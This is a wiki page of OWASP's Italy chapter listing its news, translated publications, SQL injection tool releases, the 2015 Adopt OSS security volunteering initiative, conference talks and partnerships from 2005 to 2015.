Antonio "s4tan" Parata has published an article about SQL Injection based on Inference for testing web application on PHP/MySQL platform. [http://www.ictsc.it/papers/sqlInferenceOnMySql.html Here]you can read the full article.

=== May, 2006 - Published an article about OWASP and Top-10 Vulnerabilities ===

----

Luca Carettoni has published the article "La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project". [http://sicurezza.html.it/articoli/leggi/1721/la-sicurezza-delle-applicazioni-web-secondo-lopen-/ Here]you can read the full article.

=== June, 2005 - OWASP Pen Test Checklist v 1.1 in Italian ===

----

Thanks to Massimiliano Graziani we have translated in italian the "OWASP Pen Test Checklist v.1.1". You can download it [http://www.owasp.org/documentation/testing.html here.] Thanks to the collaboration with CLUSIT, this doc is available also [http://www.clusit.it/whitepapers.htm here.]

=== May, 2005 - Isaca Roma Newsletter about OWASP-Italy ===

----

ISACA Roma Newsletter has published an [http://www.isacaroma.it/html/newsletter/?q=node/78 interview to OWASP-Italy]

=== April, 2005 - Published "MMS Spoofing" ===

----

We have published a presentation describing a detailed case study of a web application vulnerabilty [http://www.owasp.org/images/7/72/MMS_Spoofing.ppt (MMS Spoofing)].

Jim Hewitt, CISSP PMP working at CGI-AMS, affirms (slide#78): "Very interesting analysis of spoofed cell phone messaging and fraudulent billing". See: www.techvalleynyissa.org/Resources/2005_07_WebApplicationSecurity.ppt

=== April, 2005 - Published an article on ICT Security magazine ===

----

We have written an article describing the OWASP projects, Web Application Security and the next challenges. '''ICT Security'''.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.

=== March, 2005 - OWASP Top-10 in Italian ===

----

Thanks to Matteo Paolelli we have translated the '''"OWASP Top Ten Vulnerabilties in Web Application Security"''' in italian language. You can download it [http://www.owasp.org/docroot/owasp/projects/topten/OWASPTopTen2004-ITA.pdf here].

 

----

==== Tools & Research ====

----

=== Nov, 2007 - sqlmap v0.5 ===

Bernardo Damele and Daniele Bellucci have released the fifth versions of the tool [http://sqlmap.sourceforge.net sqlmap]. sqlmap is an automatic SQL injection tool entirely developed in Python. It is capable to perform an extensive database management system back-end fingerprint, retrieve remote DBMS databases, usernames, tables, columns, enumerate entire DBMS, read system files and much more taking advantage of web application programming security flaws that lead to SQL injection vulnerabilities.

You can download the latest stable version from its [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 SourceForge File List page] or the latest development version from its [https://sqlmap.svn.sourceforge.net/svnroot/sqlmap SourceForge SVN repository].

=== Dec, 2006 - sqlmap v0.2 ===

Bernardo Damele and Daniele Bellucci have released a second version of the tool "sqlmap" for Automatic Blind SQL Injection. [http://sqlmap.sourceforge.net/ Here] you can download the tool

=== September, 2006 - Wisec Project ===

Stefano Di Paola is developing Wisec - The Wiki Security Project [http://www.wisec.it Here] you can accesses the project.

=== July, 2006 - Sqlmap v0.0.1 ===

Daniele Bellucci has developed a first version of the tool "sqlmap" for Automatic Blind SQL Injection. [http://www.linux.it/~belch/?p=17 Here] you can download the tool

----

__NOTOC__ <headertabs />

[[Category:OWASP_Chapter]]
[[Category:Europe]]

Italy

2015-05-15T07:37:49Z

Ikkisoft: /* Adopt OSS, May-November 2015 */

<center>[[Image:OWASP-Italy.PNG]] </center>

==== WELCOME ====

{{Chapter Template|chaptername=Italy|extra=The chapter leader is [mailto:matteo.meucci@gmail.com Matteo Meucci]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-italy|emailarchives=http://lists.owasp.org/pipermail/owasp-italy}}

<paypal>Italy</paypal>
 

== Adopt OSS (May-November 2015) ==

OWASP Italy is pleased to announce a new initiative: '''Adopt''' '''O'''pen'''S'''ource'''S'''oftware 

Given OWASP’s mission to help organizations with application security, we have established a new initiative to provide free, voluntary-based support to open source software projects. 

Thanks to Adopt OSS, security enthusiasts are paired with participating open source projects, thus gaining exposure to real-life security engineering challenges and the opportunity for career growth. In turn, the participating projects are able to obtain free professional expertise to better improve their security posture, and ultimately build secure software. Over a six months period, OWASP Italy will facilitate the effort by coordinating the initiative and providing support when needed. 

The first edition of this initiative will take place between ''May and November 2015'', and will see the participation of '''7 OWASP Italy members''' and '''3 major OpenSource projects'''. At the end of the six months period, OWASP Italy will publish results and feedback from both volunteers and OSS maintainers. 

The official flyer can be [https://www.owasp.org/images/0/07/AdoptOSSManifest-OWASPItaly.pdf downloaded from here].

===Ntopng===
''Alessio Petracca, Mattia Folador'' 

[http://www.ntop.org/products/traffic-analysis/ntop/ Ntop] is the de-facto standard for real-time network traffic monitoring. OWASP Italy wants to help the project by increasing the security level of ntopng, performing security testing activities and supporting the remediation process. 

We will act in two steps:
* First, a penetration test targeting the web interface of ntopng will be performed, following the [https://www.owasp.org/index.php/OWASP_Testing_Guide_v3_Table_of_Contents OWASP Testing Methodology]
* Secondly, source code review of ntopng main components (such as the C++ core engine) will be statically reviewed. The objective is to address all relevant checks contained within the [https://www.owasp.org/index.php/OWASP_Code_review_V2_Table_of_Contents OWASP Code Review Guide]

In case the activities above are completed before the end of the six-months period, additional activities (such as the development of security plugins) will be discussed.
Luca Deri and Arianna Avanzini will support Alessio Petracca and Mattia Folador in these activities, by providing guidance and insights.

===WordPress===
''Paolo Perego, Sandro Zaccarini'' 

[https://wordpress.org/ WordPress] is the facto standard for web publishing. If you need a blog, if you need a new showcase website for your portfolio or a tiny e-commerce web site for your small company you will look at WordPress to start. 

Paying the cost to be the boss, WordPress during the years suffered tons of security issues, 3 major issues only in the beginning of May 2015. Either the core, plugins and themes are developed with easy to use in mind and they need to be hardened. 

OWASP Italy wants to support WordPress adopting it with the "Stand by WordPress" initiative. We will deploy the software in three different standard configurations: blog, company's portfolio and e-commerce. 

We will do continuous appsec during development of 4.3 version in order to quickly spot security issues before the August release. In addition, we will take care of hardening guidelines and both plugins and themes subsystems in order to improve overall architecture security level.

===GlobaLeaks===
''Luca Carettoni, Giovanni Cerrato, Marco Lancini''

[https://www.globaleaks.org/ GlobaLeaks] is the first open-source whistleblowing framework. It empowers anyone to easily set up and maintain an anonymous whistleblowing platform. 

Considering the potential hostile environments in which the application may be hosted, security vulnerabilities and abuses are primary concerns for GlobaLeaks’ maintainers. 

We want to help the team in their excellent application security practices, by performing vulnerability research activities in order to discover unknown bugs within the boundaries of their specific [https://docs.google.com/document/d/1niYFyEar1FUmStC03OidYAIfVJf18ErUFwSWCmWBhcA/pub threat model]. In particular, we will be focusing on two main software components (GLBackend and GLClient) and new security-relevant changes (upcoming authentication re-factoring and end-to-end encryption). 

For more information on '''Adopt OSS''', please send an email to [mailto:owasp-italy@lists.owasp.org owasp-italy@lists.owasp.org]
 

== OWASP-Isaca Conference @ Rome 11-12th December 2014 ==
The agenda is online! 
http://www.isacaroma.it/images/owasp_agenda_11-12-12-2014.JPG

 

== OWASP-Isaca Conference @ Venice 3rd October 2014 ==
The agenda: 
[[File:Venice2014.jpg]]
 
Here is the [https://www.owasp.org/images/d/d3/OWASPVenice2014.pdf flyer]

== OWASP-Italy Day @ the University of Genova (14th May 2014) ==
Thank to the collaboration with [http://www.ai-lab.it/armando Prof. Alessandro Armando] and to the availability of Gary McGraw, Ph.D. CTO, Cigital we are planning an incredible [https://www.owasp.org/index.php/Italy_OWASP_Day_2014_Genova OWASP Day next 14th May].
 

 
== OWASP Italy @ Security Summit 2014 ==
OWASP Italy participated to the Security Summit 2014 in Milan with 3 talks. 
[https://www.securitysummit.it/milano-2014/seminari-associazioni/talk-34/ See here for all the details] 
 

== OWASP EU Tour 2013 - 27th June - Rome==

<noinclude>{{:EUTour2013 header}}</noinclude>

Thanks to the collaboration with Università Degli Studi Roma Tre, next 27th June we will have the OWASP EU Tour Rome Conference. 
OWASP Europe TOUR, is an event across the European region that promotes awareness about application security, so that people and organizations can make informed decisions about true application security risks. Everyone is free to participate in OWASP and all of our materials are available under a free and open software license.

The conference will be held at Università Degli Studi Roma Tre. Address: Via Vito Volterra, 62, Rome.

[https://www.owasp.org/index.php/EUTour2013_Rome_Agenda Here you can find the agenda and all the information to participate]

== OWASP Italy @ Security Summit 2013 ==

OWASP Italy participated to the Security Summit 2013 in Milan with 2 talks. 
[http://milano2013.securitysummit.it/eventi/view/35 See here for all the details] 

== OWASP Italy Day 2012: "Web Security in a Mobile World" ==

<center>[[File:OWASPITDay2012.jpg]] </center>

We are pleased to announce that the [http://www.owasp.org/index.php/Italy OWASP Italy chapter] will host the OWASP Italy Day 2012 conference in Rome, Italy at the University of Rome La Sapienza next 23rd November 2012.

More information [https://www.owasp.org/index.php?title=Italy_OWASP_Day_2012 here]

== OWASP-Italy Board ==

*This is the '''OWASP-Italy Board''':
Founder and Chair: Matteo Meucci (Jan 2005) 
OWASP Italy Board: Paolo Perego, Luca Carettoni, Antonio Parata, Giorgio Fedon, Stefano Di Paola, Mauro Bregolin, Claudio Merloni, Raoul Chiesa.

==== Partnerships ====

*ISC2-Italian Chapter: Thanks to Marco Misitano, Paolo Ottolino and Claudio Sasso, OWASP Italy collaborates with the ISC2-Italian Chapter for new initiatives regarding Security Conferences, articles and contentes regarding SDLC.

[http://www.isc2chapter-italy.it https://www.owasp.org/images/a/a3/ISC2Italy.jpg]

*CSA Italy Partnership

[http://chapters.cloudsecurityalliance.org/italy/ https://www.owasp.org/images/6/6a/CSAItalylogo.gif]

Thanks to Alberto Manfredi (CSA Italy President) we are starting a collaboration with the Italian Chapter of the Cloud Security Alliance.

*IsecLab Partnership

[http://www.iseclab.org http://www.owasp.org/images/4/4b/LogoIsecLab.png]

We are beginning a collaboration with David Balzarotti and Marco Balduzzi of International Secure Systems Lab(IsecLab) with the goal of sharing and improving new WebAppSec projects. 

*CLUSIT Member

http://www.clusit.it/logo_clusit/clusit_logo_b130.gif

Thanks to CLUSIT and OWASP Foundation we have established a cross-membership between the two organizations. So OWASP-Italy is now a [http://www.clusit.it/soci.htm CLUSIT member] and CLUSIT is an OWASP Educational Member.

*ISACA Rome

[http://www.isacaroma.it http://www.owasp.org/images/9/98/Isacaroma.gif]

Thanks to Ugo Spaziani, we are developing seminars and new ideas with ISACA Rome. 

==== News ====

== Security Summit 2012 ==
- 21st March 2012, OWASP Italy will present 3 talks:

- Antonio Parata e Paolo Perego:"Security Testing for developers" 
- Giorgio Fedon: "Banking Malware evolution in Italy: defense approach" 
- Stefano Di Paola:"DOM Xss: la nuova generazione di vulnerabilità applicative" 
Please subscribe for free here: https://www.securitysummit.it/eventi/view/21

== Security Summit 2011 ==
- 15th March 2011, OWASP-Italy presented a seminar about OWASP news. 
Here you can download the presentations: 
- Matteo Meucci: "[http://www.owasp.org/images/5/51/Security_Summit_2011_-_Meucci.pdf OWASP Future and the OWASP Guidelines: how your company can adopt it to obtain best results]" 
- Paolo Perego: "[http://www.owasp.org/images/2/20/I_tool_OWASP_per_la_sicurezza_del_software_20110315.pdf OWASP tools for the Software Security]" 
- Giorgio Fedon: "[http://www.owasp.org/images/a/a0/Owasp_at_Security_Summit_2011_-_Mythbreaking_Automatic_Code_review_Tools.pdf Myth Busting Automatic Code Review tools]" 
More information here: https://www.securitysummit.it/eventi/view/24

'''OWASP Books are out!'''

Now you can download or buy a book on the OWASP Projects. Check it here: http://stores.lulu.com/owasp

==== Activities ====

*(Jun 10): OWASP Testing Guide presentation at FBK (Fondazione Bruno Kessler).

*(May 10): OWASP Training at London: last 28th May in London, OWASP leaders deliver a course focused on the main OWASP Projects. This course aims to change that by providing a selection of mature and enterprise ready projects together with practical examples of how to use them.
This Course was FREE for OWASP Members.
http://www.owasp.org/index.php/London/Training/OWASP_projects_and_resources_you_can_use_TODAY

*(Jan 09) OWASP Testing Guide v3 is finished! You can download or browse it [http://www.owasp.org/index.php/Category:OWASP_Testing_Project here]

*(Mar 07) Luca Carettoni has published an interview to OWASP-Italy (OWASP interviews OWASP :) )

[http://blog.html.it/archivi/2007/02/26/quattro-chiacchiere-con-owasp-italia.php Here] the full article.

*(Oct 06) ISACA Roma has published several interview with OWASP-Italy members:

[[http://www.isacaroma.it/html/newsletter/node/276 Matteo Meucci]] [[http://www.isacaroma.it/html/newsletter/node/287 Alberto Revelli]] [[http://www.isacaroma.it/html/newsletter/node/282 Antonio Parata]] [[http://www.isacaroma.it/html/newsletter/node/285 Paolo Perego]] [[http://www.isacaroma.it/html/newsletter/node/328 Carlo Pelliccioni]] 

*(Sep 06) Paolo Perego has created the new '''OWASP Orizon Project'''. Go to [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project OWASP Orizon Project] 

*(Sep 06) Matteo Meucci has been selected as the new editor of the '''OWASP Testing Guide v2'''. See OWASP [http://www.owasp.org/index.php/OWASP_Autumn_Of_Code_2006_:_Selected_Projects_Press_Release press release] and go to [http://www.owasp.org/index.php/OWASP_Autumn_of_Code_2006_-_Projects:_Testing_Guide OWASP Testing Project v2]

*(Sep 06) Carlo Pelliccioni is writing an article about the [http://www.owasp.org/index.php/Analysis_about_error_codes analysis of error codes] received by web servers.

*Top10 Vulnerabilities - OWASP-Italy survey:

[[Image:Top 10 vulnerabilities-mini.GIF]]

*(21 Jun 06) '''Infosecurity 2006''': the event is organized and managed by the CLUSIT.

Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications". [http://www.infosecurity.it/Roma/programma.php More info here]

*(1 Jun 06) '''"Quaderno CLUSIT"'''

CLUSIT has published a book entitled: "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP". Several OWASP-Italy members (R.Chiesa, L.De Santis, M.Graziani, L.Legato, M.Meucci, A.Revelli) have contributed to the writing. The document is now reserved to CLUSIT members, but will be made public in about 3 months.

*(31 May 06) Luca Carettoni has published the article '''"La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project".''' [http://sicurezza.html.it/articoli/leggi/1721/la-sicurezza-delle-applicazioni-web-secondo-lopen-/ Here]you can read the full article.

*(1 Mar 06) '''OWASP-Boston, Microsoft'''

Thanks to Jim Weiler, Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting. [http://www.owasp.org/local/boston.html More info here]

*(18 Nov 05) '''IDC - European Banking Forum'''

Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we will have a great speech at the [http://www.idc.com/italy/events/banking05/banking05_agenda.jsp IDC European IT Banking Forum 2005]. Agenda: - New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair - Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy

*(Oct 05) '''SMAU 2005''' is the 42a International ICT & Consumer Electronics Exhibition for Italy.

SMAU has accepted our submission! [http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili More info here]

*(Giu 05) Thanks to Massimiliano Graziani we have translated in italian the '''"OWASP Pen Test Checklist v.1.1"'''. You can download it [http://www.owasp.org/documentation/testing.html here.]

Thanks to the collaboration with CLUSIT, this doc is available also [http://www.clusit.it/whitepapers.htm here.]

*(May 05) '''ISACA Roma Newsletter''' has published an [http://www.isacaroma.it/html/newsletter/?q=node/78 interview to OWASP-Italy]

*(Apr 05) We have written an article describing the OWASP projects, Web Application Security and the next challenges. '''ICT Security'''.(the italian magazine about Information Security) has published the article on the number 33 - April 2005.

*The presentation of the seminar we have done in '''ISACA Rome''' (31th March 2005) is now available [http://www.isacaroma.it/pdf/050331/meucci.zip here.]

*(Apr 05) We have published a presentation describing a detailed case study of a web application vulnerabilty [http://www.owasp.org/images/7/72/MMS_Spoofing.ppt (MMS Spoofing)].

*(Mar 05) Thanks to Matteo Paolelli we have translated the '''"OWASP Top Ten Vulnerabilties in Web Application Security"''' in italian language. You can download it [http://www.owasp.org/docroot/owasp/projects/topten/OWASPTopTen2004-ITA.pdf here].

*[http://www.isacaroma.it/html/newsletter/?q=node/78 Here] you can read an interview talking about OWASP.

==== Events ====

=== 15th March, 2011 - OWASP-Italy@Security Summit ===

- 15th March 2011, OWASP-Italy presented a seminar about OWASP news. 
Here you can download the presentations: 
- Matteo Meucci: "[http://www.owasp.org/images/5/51/Security_Summit_2011_-_Meucci.pdf OWASP Future and the OWASP Guidelines: how your company can adopt it to obtain best results]" 
- Paolo Perego: "[http://www.owasp.org/images/2/20/I_tool_OWASP_per_la_sicurezza_del_software_20110315.pdf OWASP tools for the Software Security]" 
- Giorgio Fedon: "[http://www.owasp.org/images/a/a0/Owasp_at_Security_Summit_2011_-_Mythbreaking_Automatic_Code_review_Tools.pdf Myth Busting Automatic Code Review tools]" 
More information here: https://www.securitysummit.it/eventi/view/24

=== November, 2010 - OWASP-Italy Day V ===

- OWASP Day for E-Gov 2010: 9th November 2010 - Rome. 
An event organized by Consip. More information [http://www.owasp.org/index.php/Italy_OWASP_Day_E-Gov_10 here]

=== November, 2009 - OWASP-Italy Day IV ===

----
Following on from the great success of last OWASP Days the forth conference has taken place in November 2009 in Milan. 
More information [http://www.owasp.org/index.php/Italy_OWASP_Day_4 here] 

OWASP Day for E-Gov 2009: 5th November 2009 - Rome. 
More information [http://www.owasp.org/index.php/Italy_OWASP_Day_E-Gov_09 here]

=== 31st March, 2009 - OWASP-Italy @ PCI Milan ===

----

Matteo Meucci was invited to talk about OWASP Testing Guide and PCI-DSS Standard at the [http://www.pci-portal.com/lang-en/events/event-info/pcimilan PCI Milan event] last 31st March.

The presentation is published [http://www.owasp.org/images/3/38/MeucciPciMilan09.pdf here]

=== 23rd February, 2009 - OWASP Day III ===

----

[http://www.owasp.org/index.php/Italy_OWASP_Day_3 "Web Application Security: research meets industry"] Presentations are online!

=== 10th October, 2008 - Isaca Roma PCM 2008 ===

----

Matteo Meucci presented the new OWASP Projects and the Application Security in the Italian Companies. More information [http://www.isacaroma.it/html/ArchivioEventi-081010.html here]

=== 31st March, 2008 - OWASP Day II ===

----

[http://www.owasp.org/index.php/Italy_OWASP_Day_2 "The State of the Art of the Web Application Security and the OWASP guidelines in the Companies"] Presentations are online!

=== February 2008 - OWASP Italy at InfoSecurity 2008 ===

----

5th February:

*14:30 - The Owasp Orizon project: internals and hands on

[http://www.infosecurity.it/IT/eventi-sicurezza-informatica/convegni_94.aspx Paolo Perego]

6th February:

*14:30 - Costruire Software Sicuro dalle Fondamenta

[http://www.infosecurity.it/IT/eventi-sicurezza-informatica/convegni_128.aspx Antonio Parata]

7th February:

*10:30 - Tu programmi. Io buco.

[http://www.infosecurity.it/IT/eventi-sicurezza-informatica/convegni_137.aspx Luca Carettoni]

[http://www.infosecurity.it Here] you can read more information about it.

 

=== November 30th, 2007 - OWASP-Italy @ Elsag Datamat Security Forum ===

----

Matteo Meucci was invited to talk about OWASP Guidelines and SDLC Security at the Elsag Datamat Security Forum 2007 Where: Pescara When: 30th November 2007, h.12.30

=== October 20th, 2007 - OWASP Italy at SMAU E-Academy 2007 ===

----

Last 20th October 2007 we had 5 speeches at SMAU E-Academy 2007, here you can download our presentations:

*Giorgio Fedon, COO at Minded Security:

[http://www.owasp.org/.pdf "Dove sono finiti i miei soldi? Internet Banking e Cross Site Scripting"] (coming soon) [[Image:FedonSMAU07.pdf]]

*Paolo Perego, Senior Security Consultant at Spike Reply:

[https://www.owasp.org/images/7/79/PeregoSMAU07.ppt "The Owasp Orizon project - bring security at the source"]

*Antonio Parata, Security Consultant at eMaze:

"Valutazione del rischio tramite la logica fuzzy" (coming soon) [[Image:ParataSMAU07.pdf]]

*Alberto Revelli, Senior Security Consultant at Portcullis Security:

[http://www.owasp.org/images/9/9f/RevelliSMAU07.pdf "Anti-Anti-XSS: bypass delle difese del browser"]

*Stefano Di Paola, CTO at Minded Security:

"Cros-site Flashing! Gli attacchi Web di ultima generazione parlano multipiattaforma" (coming soon) [[Image:DiPaolaSMAU07.pdf]]

 

=== September 10th, 2007 - OWASP Day WorldWide: "Privacy in the 21st Century" ===

----

https://www.owasp.org/index.php/Italy_OWASP_Day_1

 

=== May 29th, 2007 - Seminar: "Software Security" ===

----

*Stefano Di Paola, Paolo Perego and Matteo Meucci will talk at the Seminar: [http://www.sicurinfo.it/informazioni/visinf.asp?IDInfo=246&CAT=53 "Which approaches to Software Security"] organized by Firenze Tecnologia.

 

=== May 15th-17th, 2007 - 6th OWASP AppSec Conference in Italy ===

----

*We are in the initial planning stages for the next OWASP Europe conference, which we plan to hold in Italy in May 2007.

[http://www.owasp.org/index.php/6th_OWASP_AppSec_Conference_-_Italy_2007 Here] you can find all the details about the conference, cfp and sponsorship.

=== April 14th, 2007 - Master on Information Security, University of Rome "La Sapienza" ===

----

*We have done a 4h seminar for the students of [http://mastersicurezza.uniroma1.it/ Master on Information Security at "La Sapienza"] for the [http://icsecurity.di.uniroma1.it/dokuwiki/doku.php?id=projects:asp Application Security Project of "La Sapienza" University.]

 

=== March 30th, 2007 - University of Rome "La Sapienza" ===

----

*Thanks to Prof. Mancini and Roberto D'Addario, we will talk about OWASP at the convention "Institutions, Companies and Information Security: comparing the problems"

[http://w3.uniroma1.it/security/Eventi/eventi.html Here] you can find more details.

 

=== March 1st, 2007 - EuSecWest 07 ===

----

Alberto Revelli and Matteo Meucci presented the new OWASP Testing Guide at [http://www.eusecwest.com/agenda.html EUSecWest]. [http://www.owasp.org/images/e/e9/OWASP_Testing_Guide_Presentation_EUSecWest07.zip Here] you take a look at the presentation.

=== February 6th-8th, 2007 - InfoSecurity ===

----

*February 6th:15.30

After the great success obtained form CCC at Berlin, Stefano Di Paola and Giorgio Fedon will talk about:" Web Security Client Side: attacks at Web 2.0" More information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=aqfi82GOKd6I748s1evI8Q%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

*February 6th:16.30

After the great effort on the Testing Guide Project, Matteo Meucci and Alberto Revelli will present: "The new OWASP Testing Guide" More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=nq6tSIuRoPVJBanBSsRiSQ%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

*February 7th:12.30

Authors of innovative SQL injection tools, Alberto Revelli and Antonio Parata will show: "Advanced SQL Injection: testing tools and defensive strategies." More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=3z04F5BgZRgfU0YX8JRYtA%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here]

*February 7th:13.30

Author of the new OWASP Orizon project, Paolo Perergo will present:"Secure programming: from theory to practice" More Information [http://www.infosecurity.it/it/infosecurity.aspx?ID_Portale=Z6skuJTSHr%2fjF7janL35RA%3d%3d&ID_Pagina=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl1=mllS8ehP3VwfAOVCVR5ckw%3d%3d&ID_MenuLvl2=fF%2b7etXTY34nfmtRTL8Shw%3d%3d&ID_MenuLvl3=fPsJu6gF%2blBE8LaUGEMYLw%3d%3d&Lang=l51VDVQfL9BdevTm%2fsJx0Q%3d%3d&ID_Evento=9HePIzyo5p29ylpGBl6CiA%3d%3d&ExtControl=FQQ52p7AGBUZth0l9Qw6MSOcqIebAeaBYiSFezT6eKEvZkQfILymgy7truUG7ii4 here].

=== January 25th, 2007 - Isaca Rome ===

----

Matteo Meucci will discuss the new [http://www.owasp.org/index.php/Category:OWASP_Testing_Project OWASP Testing Guide v2] For more information: http://www.isacaroma.it/html/GiornateDiStudio.html

=== October 7th, 2006 - SMAU 2006 ===

----

- "''The quest for secure code: code review and fundamental of secure coding.''" Matteo Meucci will present an introduction to the new OWASP Projects and OWASP-Italy activities. Paolo Perego (sp0nge) will speak about safe coding and the importance of code periodic review as natural software life cycle. Paolo will give a vision on code review and its phases http://www.webb.it/event/eventview/5772

Here are the presentations: [[Image:Meucci SMAU06.pdf|Meucci_SMAU06]] [[Image:Perego SMAU06.pdf|Perego_SMAU 06]]

- "''Advanced SQL Injection.''" Antonio Parata (S4tan) will explain SQL Injection, and how SQL Inference works on PHP/MySql platform. He will present an open source tool to support the testing. Alberto Revelli (icesurfer) will focus on Microsoft SQL Server: he will perform a live demo of sqlninja (http://sqlninja.sf.net), explaining how to obtain a pseudo-shell over SQL, how to escalate privileges, and how to play with the exotic equation: "SQL Injection + debug.exe + DNS = DOS prompt" ! http://www.webb.it/event/eventview/5774

[[Image:Revelli SMAU06.pdf|Revelli_SMAU06]] [[Image:Parata SMAU06.pdf|Parate_SMAU06]] 

[[Image:OWASP-Italy at SMAU06 2.JPG]] Luca, Carlo, Alberto, Antonio, Stefano Matteo, Paolo, Giorgio

=== September 29th, 2006 - OpenExp 2006 ===

----

September 30th, at 10:45 Antonio Parata (S4tan) will speak about SQL Injection: techniques, tools and practical examples.

Abstract: Antonio will introduce some basic concepts about software security. It will be shown how SQL Inference works on PHP/MySql platform and presented an open source tool to support the testing. Finally will be listed some advises to avoid common bugs. http://www.openexp.it/

OWASP-Italy will have a stand from September 29th to October 1st.

[[Image:Antonio Matteo Carlo.JPG]] [[Image:Antonio speech.JPG]] [[Image:Carlo.JPG]] [[Image:Claudio Luca.JPG]] [[Image:Mayhem Matteo.JPG]] [[Image:OWASP Banner2.JPG]] [[Image:OWASP Banner.JPG]]

=== June 21th, 2006 - InfoSecurity 2006 ===

----

Alberto Revelli and Matteo Meucci will partecipate as speakers at the seminar: "Web Application Security: guidelines and security auditing for web applications". The event is organized and managed by the CLUSIT.

Where: Sheraton Roma Hotel - Viale Del Pattinaggio, 100 When: 10,30 - 17,00 Who: Matteo Meucci and Alberto Revelli Link: http://www.infosecurity.it/Roma/programma.php

Agenda: -- I Session -- Introduction to Web Application Security • Which are the risks? • Risk assessment of a web application • Core pillars of web security How to develop secure web applications: • Guidelines and case-studies

-- II Session -- How to realize a security audit of a web application • The methodology OWASP Penetration Testing • The tools: OWASP WebScarab • Hands-on web application vulnerabilities: OWASP WebGoat • Advanced SQL Injection.

 

=== March 1st, 2006 - OWASP-Boston, Microsoft ===

----

Thanks to Jim Weiler (OWASP-Boston Chair), Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting of march. [http://www.owasp.org/index.php/Boston More info here]

=== November 5th, 2005 - IDC - European Banking Forum ===

----

Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we have had a great speech at the IDC European IT Banking Forum 2005 (18 Nov 2005). http://www.idc.com/italy/events/banking05/banking05_agenda.jsp Agenda:

*New standards for the ICT security auditing in the italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy and Matteo Meucci, OWASP-Italy Chair
*Workshop: unusual form of attacks and banking system violation: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy.

You can download the report [http://cdn.idc.com/italy/downloads/report_banking05_eng.pdf here].

You can download the Case-Study of a vulnerable Home Banking Web Application [http://www.owasp.org/docroot/owasp/misc/IDC_BankingForum05v1.ppt here].

=== October 5th, 2005 - OWASP-Italy@SMAU2005 ===

----

SMAU is the 42a International ICT & Consumer Electronics Exhibition for Italy. Alberto Revelli (our Technical Director) and Matteo Meucci have conducted a seminar talking about Web Application Security. Alberto has presented his new project: [http://sqlninja.sourceforge.net sqlninja]. Very cool!!

http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili

=== May 25th, 2005 - ISACA Rome 2nd meeting ===

----

May 25th we'll be in ISACA Rome to present OWASP WebGoat and a real case of a Web Application Vulnerability. Every one is invited to join the meeting.

Here is the agenda: 14.30 Registration 14.45 Matteo Meucci - Web Application Security Phase II - OWASP WebScarab and PenTest Checklist

*A case-study of a Web Application Vulnerability: MMS Spoofing

--- Web Application analysis --- Authentication and Billing of the MMS service --- Vulnerabilities --- Attack Analysis

*Learning the most common web application vulnerabilities: OWASP WebGoat

--- Http Basics --- HTML Clues --- Hidden Field Tampering --- How to spoof a Session Cookie --- Stored Cross Site Scripting --- Command Injection --- SQL Injection --- Fail Open Authentication

The meeting is hold at: Via Volturno, 65 (Rome) - Auditorium ATAC

You can download the presentation [http://www.isacaroma.it/pdf/050525/OWASP.zip here].

=== May 18th, 2005 - Workshop on Computer Crime 2005 ===

----

 May 18th, 2005 OWASP-Italy is invited to present OWASP Top 10 to the "Workshop on Computer Crime 2005" titled: "EVOLUZIONI NORMATIVE E RECENTI PROBLEMATICHE DI SICUREZZA"

